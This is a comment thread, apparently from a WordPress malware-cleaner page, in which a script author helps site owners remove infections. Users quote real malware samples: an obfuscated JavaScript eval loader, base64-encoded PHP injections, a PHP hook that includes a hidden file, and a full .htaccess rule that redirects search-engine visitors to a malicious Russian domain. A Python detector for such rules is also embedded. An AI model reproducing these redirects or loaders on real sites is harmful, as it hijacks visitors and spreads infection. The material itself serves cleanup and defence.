I’ll try to check the pattern and create a regular expression of it.
Let me know. Thanks.
Paolo
Hi David,
Can you try my scanner.
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
and send the logs to me as well, it will scan possible hack script
in your server. Thank you.
Paolo
Hi David,
I already checked the files you sent me. It’s a spamming script.
I updated my version to 2.3. You can download and run the script.
Please mind backing up your files first, then run the cleaner script, and then backup again.
Please let me know how it goes.
Paolo
As this article indicates, Malware is a major problem. Stopbadware.org reports that there are over 800,000 sites that are suffering from malware today. The process described above can be a very good set of tools to remove malware from your site, but in my experience it can come in many different and continuously innovative ways.
So if the process seems to get to difficult, or if you have gotten infected multiple times I can probably help.
I have worked to help numerous clients recover their sites, as well as monitor their sites to prevent future attacks and downtime because of being marked as infested by google and other services.
You can check out some of my WordPress Security and Malware Recovery Services.
Paolo,
You saved my life with this script. Your script worked perfectly! Thank you so very much. I would love to buy you a meal if you have a way I could get you some money.
Do you have any suggestions on how to stop this from happening again? All of the infected files have been removed and I’ve updated everything I can. Changed all passwords. Everything is working perfectly, Any other suggestions?
Thanks again.
Hi Mike,
You’re welcome, I’m happy that my script helped you with those malware issue.
My suggestion after cleaning up, if possible change the username/password of your
ftp, db, wp login access, and etc… Create a backup as well.
Make sure your plugins, themes, and wordpress are on updated version, because this is
where they start hacking.
You can also read on this page:
http://wordpress.org/tags/vulnerability
It will tell you informations about wordpress vulnerability.
Thanks again for the comment Mike. Hope you’ll have a great day!
Paolo
Your cleaning scripts saved my life. Thank you so much!!!
Hi Paola, thanks for your help..it’s really helpful…
but after cleaning done, my website unable to load and has a error message like this:
“Parse error: syntax error, unexpected ‘}’ in /… “
could you help me what’s the problem..?
Thank you very much
Hello Wahyu,
Sorry for the late reply. I was so sick, the Doctor advised me to take a break.
Did you create a backup before you run the cleaner script?
What is your site?
Let me know. Thanks.
Paolo
thanks for your script!!
Brilliant – thanks so much. Nice to know there are some good guys out there!
Thank you so much for this script! Nightmare situation turned into easy resolution!
hi there,
can the script remove this kind of malware, mainly infected on index.php but i have alot of index.php files in various folders,
if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){...}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54...];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);
Hello Jokomana,
Unfortunately, it doesn't remove this kind of malware, but I can create a pattern for it. Just send me an email with 3 infected files to info@php-beginners.com.
Thanks.
Paolo
Hi Jokomama,
I have checked your sites. You have a trojan script on your site.
I have updated my cleaner to 2.4 version. You can download and test running it. Please do create a backup first before you run it.
Let me know. Thanks.
Paolo
Hi, i am going to test run it. Do you have any idea how does this trojan virus works? how does it infect my sites, i am using shared hosting.
This creates an iframe with src’s pointing to: (sites)
http:// qzoxmylu.ddns.mobi/stds/go.php?sid=1
http:// ssnybaqn.dns1.us/stds/go.php?sid=1
Careful, site might be infected. Don’t open it.
Hi,
Script works perfectly. However, it appears again, do you think my host is infected?
Thank you very much
You have to get rid of the main malware file – it is the one that injects the files. Finding that file is difficult.
Here's what you're going to do. Create a backup of your current WordPress files and database.
1. Run Malware Scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Send the scan result to info@php-beginners.com
2. Run Malware Cleaner 2.4
3. Update your wordpress
4. Update your themes
5. Update your plugins
Paolo
Thank you buddy, emailed you
Hi Paolo,
I found this hack today, please can you help me?
Thank you.
eval(base64_decode("..."));
Hello Cris,
Can you try to run my Malware Scanner:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Save the log and send it to me at info@php-beginners.com
including 2 or 3 infected files. I'll check the files and create a pattern for them.
Let me know. Thanks.
Paolo
Hi Paolo,
I installed the "cleaner-cli_2.4" file into my root domain. What is the next step? It seems I should do more than just drop it in there. Please help.
All my .htaccess files for all my domains are full of “rewrites.” There seems to be a malicious script running somewhere. Every time I delete the “rewrite code” in these .htaccess files, they come back within an hour.
I'm hoping that the "cleaner-cli_2.4" file can clean up the hidden code. I just need to understand how to properly use it.
Thanks!
Dan
Hello Dan,
Run it using shell terminal with this code:
I hope that helps. I just saw your site; you've been blocked because of the malware.
If the script didn't remove the malicious JavaScript code, let me know.
Paolo
What is shell terminal exactly?
It is a command-line user interface to the server. It is used to connect to the server and perform tasks on it
by typing commands. It is equivalent to the DOS environment in Windows.
https://ccrma.stanford.edu/guides/planetccrma/terminal.html
Most hosting companies provide shell access; if yours does not, you may use the Cleaner HTTP version.
Just simply upload the file to your server and run it using your browser. See the instructions
above.
Thanks let me know.
Paolo,
Should this script work for http:// bannortimqimulta.ru/industry/index .php ? I just installed the script in my root folder and scanned the site, but the bad code is still in all of the .htaccess files.
Thanks!
hmmmmm… can I check your .htaccess file.
Can you send it to info@php-beginners.com
Bluehost gives me shell access to use with my favorite SSH Client. What SSH Client do you recommend, and where can I get it?
I only used PuTTY, it’s really good.
If you don’t have one, you can download it here:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Where is your donate link? Do you have a PayPal account? I really appreciate this script and would like to send you a thank you.
Wow… Thank you Happy Visitor.
I really appreciate it. I never thought about this one. Thanks for encouraging me to create a better Malware Cleaner program. Big big thanks again.
Have a great day!
Paolo,
Concerning puTTY…
After connecting with my username and hostname, I’m then prompted to enter my password, but it will not allow me to type it in. It will not allow ANY characters to be typed. You ever had trouble with this? Maybe there’s a setting I’m missing.
Dan
Hello Dan, that is normal, don't worry. Just enter your password correctly and hit enter when you're done.
Thanks, this solution was great!!
It would be even better if you would have the same solution for magento. I got malicious code on wordpress and magento at the same time, but magento seems to be a little more pain in the ass to resolve..
I am sorry, but this works on Magento as well, or on any PHP program. Just run the cleaner script.
Sorry about that.
Please make sure you create a backup of your files before you run the cleaner script, so that you can easily recover the files if something goes wrong. Let me know how I can help.
Paolo
Thanks Paolo, it worked perfectly on Magento as well.
Now I found this code at the bottom of my WordPress website and I want to remove it from all .php files. How do I do this?
Thanks
For some reason it didn’t show the proper code that I need to remove, which is:
I am so not technical, but I can’t afford help. My blogs are messed up. I’ve got the bizarre dashboard going on for all my blogs. I found your site and I am trying to run the script, but I may not have done it right. Here’s what I did:
I downloaded the file, extracted it, and uploaded it to my http://www.melissathinks.com folder via FTP. Then I went to my browser (Chrome) and typed http://www.melissathinks.com/cleaner_2.4.php. The little circle spun for a really long time and then I got a 505 error.
Did I do something wrong?
Oh and thank you soooooo much for creating this! I have spent so many hours trying to figure out what the hell happened and trying to fix it and I literally ended up crying
Oh! don’t worry Melissa, I’m here to help you. We’ll fix your blog.
Actually, you did it right. I'm not really sure why the page throws a 500 Internal Server Error; maybe it's because of your hosting's php.ini configuration.
Can you try to run my malware scanner (download and upload it to your server, the same thing you did with cleaner_2.4.php):
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
and please send the scan result to info@php-beginners.com
You can also add me on Skype: oo70vd
so that we can resolve your problem immediately.
Let me know.
Paolo
Paolo,
You are right, it did work!!! I'm such a doofus. Last night before I went to sleep, way later than normal, I was reading on my iPad and I decided to take one more look at my destroyed dashboard and guess what? It looked fine! So this morning I got up all excited and went to check it out on my laptop, still no good. I cleared cache, still no good. Used Firefox, still no good. So then I downloaded Safari and it looked great!
I haven't learned a lot of techy stuff, but I do love the scientific method. So I sat over breakfast wondering why Apple products would be different and couldn't come up with a reason other than they had NEVER accessed my dashboard before.
So I went under the hood in Chrome and instead of just telling it to clear cache, I cleared everything, passwords and all. And guess what?????
My dashboard looks normal again!!! I did the same on Firefox and it looks great there too. I don't really give a crap about IE…I try never to use that browser.
I wish I had found your blog so much earlier in the day yesterday, I would have saved so many tears
I’m heading over to your donate button now and I am going back to every forum that I went to yesterday to tell them about your amazing script!!!!
Thank you from the bottom of my heart.
Melissa
Thanks Melissa, that's really nice to hear that your site is back to normal again. Your site looks great! Thank you also, Melissa, for the donation, big big thanks.
If you have a problem with your site, just let me know.
Thanks again.
Paolo
Hi Admin
Absolutely amazing code. Used that. Worked perfectly. Thank you so much. Please reply to me at sagar@clubhack.com & chmag.in. We would love to post your article in our magazine, ClubHack Magazine.
Thank You Again.
Sagar Nangare
ClubHack
Pingback: Hacked Off | Inner Quests
Thanks for your help. We have downloaded the cleaner_2.4 file and executed it via browser from the root folder, which removed all the virus scripts. I have edited something in that code to change the file execute permission; I just added this code: chmod($dir."/".$file,0444);
Awesome! thanks for letting me know.
Hey guys,
Maybe I need to add this code too… chmod($dir."/".$file,0444);
When I’m running the cleaner_2.4 file, my page doesn’t come up. You can try it here… http://www.dbdrumtips.com/cleaner_2.4.php
Where exactly in the cleaner_2.4.php file do I need to place chmod($dir."/".$file,0444);
Thanks!
Dan
Hi Dan,
I'm not really sure about that. I have checked your site, but I cannot continue; it says: Reported Attack Page! http://www.dbdrumtips.com contains malware. Your computer might catch a virus if you visit this site.
You can try ignoring the warning and continue opening the page instead; try it again:
http://www.dbdrumtips.com/cleaner_2.4.php
Or, you can use the CLI version, if you have shell access.
Let me know how I can help.
Paolo
Paolo,
I can proceed to the root domain with no trouble. It’s just that when I try to proceed with http://www.dbdrumtips.com/cleaner_2.4.php is when it just will not open. I just get, “Website Offline, No Cached Version Available.”
I tried the CLI version, but puTTY would not let me type in my password.
What do you advise?
Thanks!
Dan
Hmm.. Just continue entering the password, and hit enter when it's done. That's normal for PuTTY.
Let me know.
Paolo
Paolo,
I can proceed to dbdrumtips.com with no difficulty. It’s when I proceed to to dbdrumtips.com/cleaner_2.4.php is when I have trouble. I get “Website Offline, No Cached Version Available.”
I tried the CLI version, but puTTY would not let me type in my password. It just seems to freeze.
Your cleaning tools would be a dream come true if I could just get them to work for me. Can you advise me further? I appreciate your help!
Dan
Can you add me on Skype: oo70vd
I’ll help you.
Paolo
If I upload the cleaner into a specific directory (not the root) will it just clean the files in that directory?
I wanted to test it before applying to the whole site.
I have an infected Joomla site. I am assuming it will work for this.
Thanks
Yes, that's right, it will just clean all the files in that directory. It works well on Joomla too. Make sure you back up your files before you run the script.
Just to make sure.
Let me know.
Hello, my site is WordPress with this problem. I backed up everything and fixed the virus problem, but now when entering the site in IE it is misaligned to the left. I have since updated WordPress and the theme, and uploaded some files such as CSS, to no avail. Please help me. In other browsers like Chrome and Firefox it works normally; the lightbox also only works in IE, not in the others.
http://www.clubdofitness.com.br
Hello Rodrigo,
I have checked your site; you have a great site. It really looks great on FF 10.0.2 and Chrome 17.0.963.56 m, but on IE 8 it does not.
Don't worry, we'll fix that ASAP. I'll keep you posted.
Paolo
Hi Rodrigo,
Wow, this type of error is really difficult to locate.
Actually, this is my first time.
http://www.php-beginners.com/images/2012-03-02_2201.png
I think the file is:
/wp-content/themes/fitness/header.php
Just modify the file. The (<) in <!DOCTYPE html> looks like a normal less-than (<) symbol, but it is not. That's why you have to replace it by typing a real less-than (<).
Let me know; maybe I'm wrong, but it works fine in my browser.
Regards,
Paolo
I LOVE YOU! Thanks for sharing this with the world. It has saved me tons of time
I’m going straight to the “Donate” button, you deserve it!!
Will you consider keeping the cleaner updated?
Big big Thanks Victoria, I received your donation already. Thanks again.
Yes, I will keep this updated.
Thank you again Victoria. Have a great day!
Paolo
Paolo,
I’ve added you on Skype, and sent you a message.
Dan
This was the code that was in all of my .php files
Unfortunately, I started manually removing it in Dreamweaver, before I found your cleaner…I just ran it and I’m hoping it worked! I have to wait for my site to go back online ( I took it down, so the malware wouldn’t mess with anyone else’s system)
Thanks so much!
~Rena~
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6c..."));
Hi Rena,
The cleaner script can totally remove that malware code.
This malware code redirects your visitors to another site (costabrava.bee.pl).
I hope it's removed already. Let me know.
Thanks,
Paolo
Hey Paolo!
It just did it again…almost a month later (worst.day.ever.)…I'm gonna run the scanner again! It worked last time.
Then I'm going to change all my log-ins, etc.
Thank You…Again, hehe,
~Rena~
That’s really bad. Please send the scan result I’ll check it out.
Paolo
Excellent weblog here! Additionally your site quite a bit up very fast! What host are you the usage of? Can I get your affiliate link on your host? I desire my web site loaded up as fast as yours lol
hello sir..
I did a scan using cleaner_2.4.php and it shows 0 Found Infected Files.
However, when I scan my website using sucuri.net it shows Site infected with malware.
And how do I use Cleaner CLI 2.4 with the command prompt?
Do I need to open cmd.exe and insert the code that you gave above, or extract the zip file and open it with cmd and insert the code?
thank you in advance.
I see, when I click your site from the Google search result it redirects me to the hacker's web page (do not visit the site: massage-pool.ru/mysave/index.php). This leads to losing visitors to your site and has a bad effect on your SEO work. We need to stop this attack ASAP.
Is it okay if you’ll send to me your .htaccess and index.php files to info@php-beginners.com? I will check it and see what I can do to remove it.
Thanks. Let me know.
Paolo
I already sent you the .htaccess and index.php files. Please check your email from goodigi2011@gmail.com.
thank you again.
Hello Haris,
I got your email. Your ".htaccess" file is infected; you have to delete the code from lines 1-16.
The malicious code that was inserted in your ".htaccess" redirects your visitors to the hacker's site (massage-pool.ru).
Below is the malicious code. You have to delete these lines of code.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
</IfModule>
Let me know.
Paolo
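The rules above are the classic referer-cloaking shape: a RewriteCond on %{HTTP_REFERER} against a long alternation of search engines and social sites, then a RewriteRule sending the visitor to an external host with a 301. Direct visits (no matching referer, including the site owner checking the page) see nothing, which is why this thread keeps finding the problem only through Google results. As an added example that is not part of the original post or of the cleaner script, here is a small Python check that parses an .htaccess file and reports any RewriteRule whose target is an absolute URL on a host you do not own and whose condition chain tests HTTP_REFERER. The two samples embedded in it are constructed: the malicious one has the quoted structure with a shortened engine list and a placeholder host (attacker.example); the clean one is the standard WordPress block, which must not be flagged.

```python
"""Flag referer-conditional redirects to foreign hosts in Apache .htaccess files."""
import sys
import re
from urllib.parse import urlparse

REWRITE_COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.IGNORECASE)
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.IGNORECASE)


def find_referer_redirects(htaccess_text, own_hosts=()):
    """Return [(line_no, target_url)] for every RewriteRule whose target is an
    absolute URL on a host not in own_hosts and whose RewriteCond chain tests
    %{HTTP_REFERER}. Apache attaches the RewriteCond lines immediately above a
    RewriteRule to that rule alone, so the pending chain resets after each rule."""
    own_hosts = {h.lower() for h in own_hosts}
    findings, pending_conds = [], []
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        cond = REWRITE_COND.match(line)
        if cond:
            pending_conds.append(cond.group(1).upper())
            continue
        rule = REWRITE_RULE.match(line)
        if not rule:
            continue
        target = rule.group(2)
        refer_tested = any("HTTP_REFERER" in c for c in pending_conds)
        pending_conds = []  # conditions apply only to the rule just seen
        host = urlparse(target).netloc.lower()  # '' for '-', '/index.php', etc.
        if host and host not in own_hosts and refer_tested:
            findings.append((line_no, target))
    return findings


def scan_file(path, own_hosts=()):
    """Read one .htaccess file and run the check over it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_referer_redirects(fh.read(), own_hosts)


# Constructed sample: the shape quoted in the thread, engine list shortened,
# host replaced by a placeholder. Not a real redirect target.
MALICIOUS_HTACCESS = r"""<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook|twitter)\.(.*)
RewriteRule ^(.*)$ http://attacker.example/mysave/index.php [R=301,L]
</IfModule>
"""

# Constructed sample: the standard WordPress block, which must not be flagged.
CLEAN_HTACCESS = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:
        print("malicious sample:", find_referer_redirects(MALICIOUS_HTACCESS))
        print("clean sample:", find_referer_redirects(CLEAN_HTACCESS))
    for p in paths:
        for line_no, target in scan_file(p):
            print(f"{p}:{line_no}: referer-conditional redirect to {target}")
```

A legitimate rule may redirect to your own domain (a www canonicalisation, for instance), which is what own_hosts is for. A hit only tells you the rule is present in the file right now; as Haris and Mark report further down, it says nothing about what keeps writing it back, which is what the scanner step in the thread is after.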
thank you for your reply..
I already deleted all that before, but it appears again after an hour…. It doesn't matter what I do, it will appear again in .htaccess….
Hello Paolo,
I’m having the exact same situation. The site is redirecting to the same massage-pool. I’m deleting the lines from the .htaccess file but like haris, they come back after an hour or so.
I have only run the cleaner via the website option. When I run the cleaner via the CLI it says “could not open input file.”
Anything you can do would be great. We’re going on 24 hours of infection and I can’t get it out.
Take care,
- Mark
Hi Mark and Haris,
We need to figure out where and what file is writing back the malware code again.
Here's what we are going to do. Can you run a malware scan on your site? Just download and run the file (see link below) and send the scan result to info@php-beginners.com
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Let me know. Thanks.
Paolo
This script is working very well. Thank you Paolo you saved me.
That’s nice to hear. You’re welcome.
can we run this script from a web browser?
Yes, use the HTTP cleaner version.
Pingback: Tired of hackers « MichaelKerley.net
I ran the browser version on a couple of sites a few days ago and it worked great!
Unfortunately, I ran into time-out problems on my main site, so today I tried running from terminal ssh. After a while I was worried it wasn’t working, so I aborted . . . and when I checked the cleaner_log all I see is a list of folders (not the list of files I got when I ran the browser version). And they were folders in the NEW WP install I thought was clean! . . . it never got to the .old and .HACKED folders where I know there are problems.
Is this just a list of what it checked (rather than what it fixed)?
If I let it run will I get a list of what it fixed?
or is there a way to run it on specific subfolders?
Thanks for your great work!
Hello Dewluca,
The CLI version is faster than the browser version of the cleaner; that's the difference. The list of directories that was in cleaner_log are the directories that were visited/checked by the cleaner script. If the cleaner sees a malware / malicious script in a certain file, it will list that file in cleaner_log.
You can run the cleaner on a certain directory just by placing the cleaner file in that directory, for example, /www/php-beginners.com/wp-content/cleaner_2.4.php; it will scan all the files inside the /www/php-beginners.com/wp-content/ directory and then clean those files that have malware/malicious code.
Thanks for using the cleaner script. Just let me know if you still have problems. Thanks.
Paolo
Is this script specific to wordpress? I have a bunch of concrete5 sites and a zen cart site that has been infected by the same hack.
Hello Alex,
This works well on all PHP programs: WordPress, Joomla, Magento, etc…
But don’t forget to backup your files first before running the cleaner.
Let me know how it goes. Thanks.
Paolo
I'm so happy I found this. I am having the same issue (WordPress!). I could not get the cleaner script to run in my browser (kept getting a 500 error), but I dusted off my DOS skills and ran it in PuTTY. Now I have a log, but I have no idea what it means…it looks like all the files it cleaned were in an old WP folder that shouldn't be accessed by the more current site. Any thoughts?
Hi Kelly,
I’m glad that you’re happy you found this site.
When you run the cleaner script any malicious and malware script
is immediately deleted.
Can you send me the cleaner_log at info@php-beginners.com?
Also, please run http://www.php-beginners.com/wordpress-hack-malware-scanner.html
it will help us find potential malware or malicious script on your site. Please send
the scan result as well.
Let me know. Thanks.
Cheers,
Paolo
Awesome. I did get it to work on one domain, and noticed it’s on some others. I am working on cleaning everything, and I will send you the logs. THANK YOU!
Hello Kelly,
Sure not a problem, just let me know if you need help. Thanks.
Paolo
Heya i am for the primary time here. I came across this board and I to find It truly useful & it helped me out a lot. I’m hoping to provide something again and aid others like you aided me.
Hey Paulo,
So glad I found your site. One of our WordPress sites got hacked just over a week ago; it was redirecting to another site. I noticed that the files on our server had been modified and had some base64 code inserted, so I went through and replaced all the files with ones from my last backup. We also changed all passwords etc. but were still getting the problem.
Anyway, I ran your cleaner script and it found a load of files I'd missed, and thankfully it's all fixed now, thank you so much. I've now gone back and made sure our WordPress and plugins are fully up-to-date and that we have strong passwords.
thanks again
Hello Mark, Awesome, thanks. I’m glad that it worked well for you. Please do create a backup of your clean files.
Have a great day!
Paolo
Hi…
Mine got infected as well. I tried to find the culprit by decrypting the gzinflate, and finally got this code:
if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
    $GLOBALS['mfsn'] = '/home/path/to/mydomain/cp/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/ec5.php';
    if (file_exists($GLOBALS['mfsn'])) {
        include_once($GLOBALS['mfsn']);
        // ob_start('dgobh') registers dgobh() from the included file as the
        // output-buffer callback, so it gets to rewrite the whole page output
        if (function_exists('gml') && function_exists('dgobh')) {
            ob_start('dgobh');
        }
    }
}
Do you guys know what this code intends to do?
Hello Dobol,
That malware simply calls another file to execute.
/home/path/to/mydomain/cp/tinymce/jscripts/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/ec5.php
I think you have a TinyMCE vulnerability issue. hmmm.. but I'm not really sure yet.
Can you send me the infected file (where the eval(gzinflate(…)) code is) and ../inlinepopups/skins/clearlooks2/img/ec5.php?
I’ll check them, and see what I can do.
Thanks.
Paolo
Hi Paolo..
Thanks for your response,
Here is the links to the files
http://www.mediafire.com/download.php?c2k1xj425oqcjo3
both ec5.php, the decrypted version of ec5.php, and the infected file.
Hello Dobol,
These are dangerous files; you have to delete them immediately.
They're all malicious files.
Can you also run my malware scanner script, so we can find the
other malicious files on your server? See the link below:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
Please send me the result asap at info@php-beginners.com
Thanks.
Paolo
Thanks tons!! I ran this on a client's site which has an enormous file volume. In the end there were 20k compromised files inspected and cleared. Life saver status. Kudos to you!!
AWESOME!
Pingback: Hacked! » manyhighways
Hello Paolo! I admire how you help people in trouble like me.
Could you tell me what this script did to one of my sites: http://pastebin.com/AVfc8rt0
I used some online tools to decrypt some parts (and found some chmod's there) but I'm not sure of all of it. I cleaned (as far as I know) the site but want to know if the database was compromised.
Thanks in advance!
Hey Daniel,
I tried to decrypt the eval code; here's what I've got.
http://pastebin.com/LXf0zPtG
http://pastebin.com/WdpM8FdN
http://pastebin.com/BLFHxTWm
I think this file http://pastebin.com/LXf0zPtG is responsible for writing the content of the malware codes.
But I'm not 100% sure. I just said that because I found this file_put_contents in the code.
I advise you to delete the code immediately; it might access your database, files, and everything on the server.
Change your WP and FTP password.
Other than that your site looks awesome!
Paolo
You are so kind. I deleted it already and scanned with no bad results
Thx again and keep being so helpful
Best regards!
Ciao
Don’t mention it. I’m glad that your site is clean now.
Ciao!
My site is showing up a nasty “cialas” message as the description of my site in Google SERPs. Needless to say, this is not the description seen when you simply key in the site and go there. I thought the problem might be some sort of malware, so I ran cleaner 2.5 on my site and came up clean. Does this mean I can now eliminate malware as the source of the problem? Any ideas on what is causing this?
Hi E,
I have checked your site. It really shows "cialas" in the Google result.
Don't worry, this will be replaced when Google crawls your site again.
Or you can ask Google to remove your page:
http://support.google.com/webmasters/bin/answer.py?hl=en&answer=164734&from=156412&rd=1
This attack is called a "Pharma Attack", used in the "Blackhat SEO Spam" technique.
This attack is difficult to notice, since we can only detect it by using
Google / search engines.
I tried a spider simulator on your site:
http://tools.seobook.com/general/spider-test/
It now shows the correct description. I think the cleaner deleted the
malicious script already. I hope so. But I'd advise you to run the malware scanner:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
and send the result to me at info@php-beginners.com.
Paolo:)
Hi Paolo,
Just today I have found that my server is all messed up with this eval(base64_decode trojan. I have tried to run your scanner (http://utilisbpo.info/cleaner_2.5.php) but it's giving an error page. Can you please look into it? I have a lot of my clients' sites hosted here.
Thanks and regards,
Jawad Khan
eTek Studio
http://www.etekstudio.com
845-704-1900
Hello Jawad,
Oh! You need to remove that immediately.
Can you run it using the shell terminal?
I tried running the cleaner:
http://www.utilisbpo.info/cleaner_2.5.php
but it didn’t give me an error. It’s loading…
Just wait until it finishes scanning all the files,
don’t close the browser. When it finishes loading
please send me the result.
But I would suggest running this on the shell terminal or the
CLI cleaner version because it's fast.
Also, please don’t forget to backup your files.
Let me know.
Paolo
WOW, what a quick response. Really impressive.
How do I use the shell terminal? I am not a developer.
I have removed the file as you advised. When it was uploaded, it was showing some results (maybe 500-1000 files). But after a few minutes, it was giving an error message.
Best regards,
Jawad
By 'removing that', were you referring to the virus or the file? I have removed the file. Please correct me if I am wrong.
Thanks and regards,
Jawad Khan
eTek Studio
http://www.etekstudio.com
845-704-1900
Hello Jawad,
That's good! I thought you were not a developer.
You don't need to remove that manually. I was referring
to using the cleaner script to remove the malware codes.
But if you removed it and the site is still working well,
that's good.
I was referring to both of them. Some malicious codes are inserted in one file; most of them are inserted inside a normal PHP file.
Just run the cleaner script it will do the job.
Hi Paolo,
The script is working fine if I run it folder by folder. But if I put it in the root, it's giving a 500 error. I realize that it's because it has to scan thousands of files, so it must be timing out.
I have an unlimited hosting plan through GoDaddy, so this time out is kind of strange.
Any suggestions? It will take days to clean by going into each folder. Is there any way I can run it through the root?
Thanks and regards,
Jawad Khan
eTek Studio
http://www.etekstudio.com
845-704-1900
Hello Jawad,
I would suggest you use the CLI version.
You can access your server using SSH; here's the
tutorial for GoDaddy:
http://support.godaddy.com/help/article/4942
If you have problems accessing it, please let me know.
Thanks.
Hi Paolo
My 5 sites have an eval(base64_decode("etc etc Trojan in every theme index file and more. Dreamhost gave me a list. I found your excellent site and ran your browser version of the cleaner on a couple of the sites and it worked, which was FANTASTIC:) Thanks so much. There were even more infected files than on Dreamhost's list. However, this morning I'm back to square one. Could the problem be just that I didn't do all the sites one after the other? I actually tried to do a couple of sites at a time, but this didn't appear to work. Can you please advise?
Hi Ali,
Yeah! I think the malware script resides on the other sites that you
haven't cleaned. Try to run the cleaner on the sites that you never
cleaned before, and then on the other sites. See if it injects
the malicious codes again.
Also, please change your FTP & WP passwords.
If problem still persists, run the malware scanner:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html
send the scan result to info@php-beginners.com
I'll try to find the file that is causing the malicious codes to
keep coming back.
Let me know. Thanks.
Paolo
Hi,
The 500 internal error continues to occur when I execute scanner.php and cleaner.php.
I ran the HTTP version.
Please Please help me~~
Hi Sam,
Did you run them together at the same time? That's not advisable,
especially on the HTTP version.
A 500 internal error is a really very general type of error reporting.
This means something has gone wrong inside your server; this may be
because of overload or something, because running the scanner or cleaner
in the HTTP version consumes a lot of memory.
If you still see 500 internal server error. Please contact your
hosting support.
I'm gonna be upgrading this so it won't happen again. Let me know.
Keep you posted. Thanks.
Paolo
Hi
I have the god_mod trojan and it is a pain. The trojan has infected all my .php files. Your script can detect the infected files but can't clean them. When I look at the file, some extra code (uuencoded) is added on the same row as the starting <?php. Is it possible to make a script that removes the row and adds a new <?php? I use this script at the CLI to detect the trojan (can't use PHP CLI or your web script).
find . -type f -exec grep -l "god_mod" {} +
Best Regards
Erik
Yeah! Sure, can you paste a sample of the infected code here:
http://pastebin.com/
I'll check it and create a pattern for it.
Let me know. Thanks.
http://pastebin.com/E1T1YuWu
Can you send me the whole file instead, Erik, to info@php-beginners.com?
I just want the whole malware signature. Thanks.
Paolo
Done
I have mailed you a WordPress file, wp-mail.php.
Oh! Yeah! Erik, I forgot to email you back.
I already included the "god_mod_on" malware signature
in cleaner_2.6; I upgraded the version.
It will now clean your site. Please download and run it.
Let me know.
Paolo
Hi,
I have cleaned two sites through the SSH version,
and I requested a review from Google, but it was rejected.
Can you solve it after you check the log file I scanned?
Let me know your email address.
Thanks.
Yes, sure, send it to info@php-beginners.com
I'm sorry Sam, but what do you mean by "requested
a review and rejected by Google"?
Yes, I have cleaned my site using your tool (SSH version) and then I requested a review from Google.
But it was rejected by Google.
I will send you the scan log files (2 sites).
Thanks.
I sent you scan and clean logs.
I want to be off Google's blacklist^^
Thanks.
Ah ok hehehe.. how did you know you were blacklisted by Google?
Many thanks for your kindness.
My one site is restored to normal. Thanks.
The blacklist I mentioned is: when I access the web site, it is blocked in Firefox..
GREAT! That's really nice to hear. Be careful next time; make sure you have updated WP and plugins.
Paolo
This is a real basic question. Where do I enter the shell script? In cPanel or in a local app that connects with my FTP? My Bluehost account was recently attacked and I did all the fixes manually and spent a few days fixing everything. I've read about using shell scripts but wasn't sure where to input the code. I'm on a Mac using Lion if that means anything.
Thanks for your help!
John
You're welcome John. Good question, John.
